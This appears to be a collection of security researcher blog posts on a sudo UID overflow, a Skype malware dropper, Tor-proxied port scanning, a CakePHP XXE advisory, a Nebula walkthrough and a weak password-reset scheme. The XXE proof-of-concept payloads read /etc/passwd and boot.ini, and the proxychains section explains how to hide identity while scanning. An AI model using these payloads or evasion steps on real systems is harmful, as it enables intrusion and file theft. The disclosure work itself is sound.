ZDI-13-252 - Cogent DataHub Heap Overflow Remote Code Execution Vulnerability

Zero Day Initiative (ZDI) has published an advisory for a heap overflow vulnerability in Cogent DataHub which i have found few months ago. Full advisory can be read here ZDI-13-252.

Earlier this year i have also found some null pointer dereference bugs leading to a denial of service in DataHub. I will post some PoC's soon.

Funny sudo bug

Around a month ago i was performing a task where i needed to create a user with a very large UID in the system. The required UID happened to be 2147483648 (0x80000000) exactly.

root@hive:~# adduser -u 2147483648 test1

Next i switched to the newly created user and typed sudo.

test1@hive:/$ su test1
test1@hive:/$ sudo

And this was the result:

test1@hive:/$ sudo
sudo: perm stack underflow: Invalid argument
sudo: unknown uid: 2147483647
Segmentation fault

We can see here that the UID value was wrapped to the 2147483647 value (0x7fffffff) followed by a segfault.

We can have some fun with it e.g. creating a user with the 0x7fffffff UID. This way sudo will no longer crash, but it will be called for a different user : ). The bug was tested on the 1.8.5p2 version 32-bit OS. Additional details can be found in the bug report.

Skype Malware Analysis

When i came back from work today and fired up Skype, multiple messages popped up immediately. Some of them in in English and some in Polish, but all leading to the same url with "pictures" of me ; oo. Another interesting fact was that all the messages came from people working at the same company (zomg APT alert ;D).

The messages looked like this:

Messages in English and Polish encouraging to visit the links

We check what is behind the url shortener:

zip file !

Crunchpress seems to be a 'hacked' website:

crunchpress image folder with some aditional content

Lets download and unzip it:

Oh noez! no pics just exe : (

Quick scan @ virustotal.com gives 7/44 and identifies the file as a dropper:

virustotal results

Not surprisingly it downloads something using HTTP protocol:

Actual bad stuff downloaded here

Let's see what we have there. First some quick geo localization request:

hi ho

Next a list of 'unwanted' domain names is downloaded (full list available here).

Anonymous port scanning using proxychains and tor

When testing a web application or doing a reconnaissance Tor Browser Bundle is all we need to hide our true identity, but what about other activities? In this short post i will explain how to stay anonymous during port scanning. We will need the following tools to achieve this goal:

• tor,
• proxychains,
• nmap. 

Proxychains is a proxifier supporting HTTP, SOCKS4 and SOCKS5 proxies. It is shipped with BackTrack Linux by default and already configured to use tor. You can verify this by looking up /etc/proxychain.conf, last line should be like this:

We are ready to fire up nmap:


Now, let me explain what happened there. We run nmap thru proxychains with the following options:

• -sT - full TCP connection scan
• -PN - do not perform host discovery
•  -n - never perform DNS resolution (to prevent DNS leaks from tor)
• -sV - determine service version/info
• -p - ports to scan (for testing purposes i only gave 3 ports to scan, proxying a portscan thru tor makes it really slow, so perhaphs --top-ports  option should be taken in consideration)
• - self explanatory

In the scan log we can see the "chain" that goes from 127.0.0.1:9050 (tor proxy) to our scanned host. It is possible that we will encounter a situation where this scan fails, because tor endpoints are often blocked (the reason is spam or other malicious activity). The solution may be adding a common, public proxy to the "chain". We can do that by simply editing the proxychains.conf and adding a new entry at the end of the [ProxyList] (be sure that random_chain option is disabled).

That's all for tonight, hope somebody will find this information useful.

CakePHP 2.x XXE injection

# Exploit title: CakePHP XXE injection # Date: 01.07.2012

# Software Link: http://www.cakephp.org # Vulnerable version: 2.x - 2.2.0-RC2

# Tested on: Windows and Linux # CVE: CVE-2012-4399 # Author: Pawel Wylecial

# http://h0wl.pl

1. Background

Short description from the project website: "CakePHP makes building web applications simpler, faster and require less code."

2. Vulnerability

CakePHP is vulnerable to XML eXternal Entity injection. The class responsible for building XML (it uses PHP SimpleXML) does allow local file inclusion.

3. Proof of Concept

Linux:
<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file:///etc/passwd" >]>
<request>
  <xxe>&payload;</xxe>
</request>

Windows:
<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file:///C:/boot.ini" >]>
<request>
  <xxe>&payload;</xxe>
</request>

4. Fix

Fix applied in version 2.2.1 and 2.1.5. See official security release:
http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1

5. Timeline

1.07.2012 - vulnerability reported
13.07.2012 - response from CakePHP
14.07.2012 - confirmed and fix release

exploit-exercises.com walkthrough - Nebula level02

So here's our challenge: http://exploit-exercises.com/nebula/level02.

We have an environment value USER copied to the buffer without any checking. In the next step the buffer content is executed with a system() call. Basically we just need to prepare USER environment variable with a "proper" content and we are good to go:

level02 walkthrough.

And that's all :)

How to NOT implement password reminder function

A quick post about my recent discovery. I created an account on a some website and wanted to get my password reminded. There was only one step - provide e-mail address used to register.

My first suprise was that the password was changed immediately without any confirmation. That means if i only knew a person e-mail i could change his password !

Second surprise was the pattern that emerged when i generated few passwords (for different accounts with different passwords):

XS?dh*96
NJ*fz!45
KX$mm!73
ZE*wx*98
PJ*fg?93
ZC?gb?4
JU!ig*80
YZ*vz@95
DD@fy@70
MX*em%72
DM%cn%17

[2 upper letters][special char][2 lower letters][special char][number max 2 digit].

Can you spot the problem ?

• I am able to change someone's password knowing only his e-mail,
• I know the generation pattern for this new password.

Based on those rules we are able to generate a dictionary file, and try to crack the password. However in this case it is not critical beacuse this is a webapplication. We have:
26 x 26 x 6 x 26 x 26 x 100 = 274185600 possible combinations, so the dictionary file would be around 2.2 GB size. Yep, it seems like a lot of time, but in case of flaws in the randomness of the string generation we could probally shorten the amount of time needed to crack it - i need to examine it deeper. To sum up, it does not seem to be a threat (for now) but those patterns definitely should have not appear in that function.